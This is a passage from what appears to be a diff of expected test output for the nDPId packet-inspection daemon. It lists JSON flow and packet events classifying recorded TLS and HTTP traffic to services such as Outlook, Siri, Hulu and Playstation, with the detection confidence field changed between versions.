{"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"outlook.com","server_names":"*.internal.outlook.com,*.outlook.com,outlook.com,office365.com,*.office365.com,*.outlook.office365.com,*.office.com,outlook.office.com,substrate.office.com,attachment.outlook.live.net,attachment.outlook.office.net,attachment.outlook.officeppe.net,attachments.office.net,*.clo.footprintdns.com,*.nrb.footprintdns.com,ccs.login.microsoftonline.com,ccs-sdf.login.microsoftonline.com,substrate-sdf.office.com,attachments-sdf.office.net,*.live.com,mail.services.live.com,hotmail.com,*.hotmail.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"71d9ce75f347e6cf54268d7114ae6925","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=outlook.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"4E:39:B4:13:4B:8C:77:57:7D:80:3D:76:40:E8:88:22:05:00:1C:58"}} +00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646483012464,"flow_last_seen":1646483012643,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646483012643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646483012464,"flow_last_seen":1646483012821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4952,"flow_avg_l4_payload_len":707,"midstream":0,"thread_ts_msec":1646483012821,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"outlook.com","server_names":"*.internal.outlook.com,*.outlook.com,outlook.com,office365.com,*.office365.com,*.outlook.office365.com,*.office.com,outlook.office.com,substrate.office.com,attachment.outlook.live.net,attachment.outlook.office.net,attachment.outlook.officeppe.net,attachments.office.net,*.clo.footprintdns.com,*.nrb.footprintdns.com,ccs.login.microsoftonline.com,ccs-sdf.login.microsoftonline.com,substrate-sdf.office.com,attachments-sdf.office.net,*.live.com,mail.services.live.com,hotmail.com,*.hotmail.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"71d9ce75f347e6cf54268d7114ae6925","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert Cloud Services CA-1","subjectDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=outlook.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"4E:39:B4:13:4B:8C:77:57:7D:80:3D:76:40:E8:88:22:05:00:1C:58"}} 
00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":458,"packets-processed":457,"total-skipped-flows":0,"total-l4-payload-len":197833,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":32,"total-detection-updates":38,"total-updates":0,"current-active-flows":27,"total-active-flows":36,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":230,"global_ts_msec":1646495488872} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495488872,"flow_last_seen":1646495488872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488872,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1646495488872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488872,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8\/MhAAEAGRHDAqAGAD6Anu7NKAbvmP22QAAAAAKAC+vBpUQAAAgQFtAQCCAoE\/txmAAAAAAEDAwc="} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1646495488880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646495488880,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGTzkPoCe7wKgBgAG7s0optQbo5j9tkaAS9LPzBQAAAgQFtAQCCAoEQEeaBP7cZgEDAwc="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1646495488882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646495488882,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5\/MpAAEAGQnHAqAGAD6Anu7NKAbvmP22RKbUG6YAYAfaZtgAAAQEICgT+3HEEQEeaFgMBAgABAAH8AwO25geT89HZVQIHdAvPqVcdroWBp1YfQbaMJ\/IT9jA01iAQ9v2Qg1QtgoSL\/wrZgtn2pCmqUafGB71JcGJ1a5vPpQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFndXp6b25pLmFwcGxlLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAfoSMbRE149N9PW6YpT\/B1gLVQ\/izORnimYk5vzkOPIwAXAEEEYgA3US97mm0LBVaj+yl1ih4nt3Ma4wqV+qwTQtcgUnIu95ynuvYl8aODuWCNRrQ8KDDItT25yW1YelOufG9kvAArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495488872,"flow_last_seen":1646495488882,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495488882,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.2","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":461,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.3","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646495488872,"flow_last_seen":1646495488882,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646495488882,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.2","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":461,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"tls": {"version":"TLSv1.3","client_requested_server_name":"guzzoni.apple.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"}} 
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.GoogleCloud","breed":"Acceptable","category":"Cloud"},"http": {}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482801387,"flow_last_seen":1646482801394,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Bloomberg","breed":"Acceptable","category":"Network"},"http": {}} 
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1646482825245,"flow_last_seen":1646482890325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482844787,"flow_last_seen":1646482844825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5346,"flow_avg_l4_payload_len":594,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482646628,"flow_last_seen":1646482646693,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5845,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482844787,"flow_last_seen":1646482844825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":5346,"flow_avg_l4_payload_len":594,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482646628,"flow_last_seen":1646482646693,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5845,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1646482686914,"flow_last_seen":1646482687080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646482879566,"flow_last_seen":1646482879632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4764,"flow_avg_l4_payload_len":595,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646482860064,"flow_last_seen":1646482860150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5476,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":462,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646495488890,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"}} 
